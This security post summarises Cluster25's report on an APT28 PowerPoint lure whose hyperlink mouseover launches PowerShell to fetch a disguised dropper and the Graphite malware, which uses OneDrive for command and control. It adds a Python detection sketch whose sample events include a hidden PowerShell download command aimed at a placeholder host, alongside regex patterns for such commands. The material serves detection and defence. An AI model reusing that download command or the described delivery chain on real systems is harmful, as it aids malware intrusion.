The threat intel team at Cluster25 have identified a PowerPoint document, linked to APT28 (aka Fancy Bear), which exploits a code execution technique when a user opens the document as a presentation and moves the mouse over a hyperlink. The PowerPoint “lure” document uses a template potentially linked to the Organization for Economic Co-operation and Development (an intergovernmental group based in Paris). The presentation contains 2 slides outlining the instructions for using the French-English/English-French interpretation feature in Zoom meetings. The “mouseover” of a hyperlink on the slide triggers an embedded PowerShell script that downloads an encrypted JPEG file that is actually a malicious dropper DLL. This DLL then downloads an additional encrypted JPEG file that contains the Graphite malware. Graphite abuses the Microsoft Graph API to communicate with OneDrive, which acts as its Command and Control (C2) server: it queries the OneDrive folder for new files through the Graph API and downloads any it finds. These files contain shellcode that is executed on the infected device. Once C2 communications have been established, Graphite can be leveraged to run scripts or download additional malware to the infected device.
Since this form of code execution, similar to the Excel MSHTML Remote Code Execution Vulnerability (CVE-2021-40444), does not rely on macros, disabling macros does not mitigate it. Currently there is no technical mitigation for this vulnerability; the primary defense is user training to not open files from untrusted senders or locations. Check back, as we will update this post as more details on mitigation strategies become available.
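Even without a patch, the chain described above leaves a process-creation footprint: PowerPoint (POWERPNT.EXE) spawning PowerShell with a download-capable command line, fetching a remote file that is named like an image. The following detection sketch is an added example, not code from the Cluster25 report. It parses constructed, Sysmon-style process-creation events flattened to key="value" lines and flags script hosts spawned by Office applications, adding weight when the command line can download content, uses hidden or encoded PowerShell switches, or points at a remote payload with an image extension. The host lists, regexes and sample events are assumptions to tune for your own telemetry, and the sample lines contain no real indicators.

```python
"""Detection sketch for the PowerPoint mouseover -> PowerShell download chain.

Added example, not code from the Cluster25 report. Parses constructed,
Sysmon-style process-creation events (key="value" pairs on one line) and
scores script hosts that were launched by an Office application.
"""
import re
from dataclasses import dataclass

# Assumed lists; extend to match the Office and interpreter binaries you see.
OFFICE_HOSTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line markers (assumed heuristics, not signatures from the report).
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|https?://",
    re.I)
HIDDEN_RE = re.compile(r"-(w(indowstyle)?\s+hidden|enc(odedcommand)?\b|nop\b)", re.I)
IMAGE_EXT_RE = re.compile(r"https?://\S+\.(jpe?g|png|gif)\b", re.I)


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Turn one key="value" log line into a ProcEvent; missing keys become ''."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcEvent(fields.get("Image", ""),
                     fields.get("ParentImage", ""),
                     fields.get("CommandLine", ""))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> list:
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    # The gate: an Office host directly launching a script interpreter.
    if parent not in OFFICE_HOSTS or child not in SCRIPT_HOSTS:
        return reasons
    reasons.append(f"{parent} spawned {child}")
    if DOWNLOAD_RE.search(ev.command_line):
        reasons.append("download-capable command line")
    if HIDDEN_RE.search(ev.command_line):
        reasons.append("hidden/encoded PowerShell switches")
    if IMAGE_EXT_RE.search(ev.command_line):
        reasons.append("remote payload disguised with an image extension")
    return reasons


def triage(lines) -> list:
    """Return (child image, reasons) for every flagged line, in input order."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((basename(ev.image), reasons))
    return hits


# Constructed sample telemetry: one lure-like chain and two benign events.
SAMPLE_EVENTS = r'''
EventID="1" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE" CommandLine="powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('https://example.invalid/DSC001.jpeg','C:\Users\Public\DSC001.jpeg')"
EventID="1" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell.exe -c Get-Process"
EventID="1" Image="C:\Windows\splwow64.exe" ParentImage="C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE" CommandLine="C:\Windows\splwow64.exe 12288"
'''.strip().splitlines()

if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

Run as written, only the first sample line is reported: PowerPoint launched PowerShell, the command line can download, it runs hidden, and the remote file carries a JPEG extension. The parent/child gate does the real work; the remaining checks only add context, so a PowerShell launch from PowerPoint with a bland command line is still surfaced and left for an analyst to judge. In a production pipeline the same gate maps cleanly onto a SIEM rule over Sysmon Event ID 1 or an EDR parent-process query.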
Cluster25 Blog Article w/ detection info and IOCs – https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/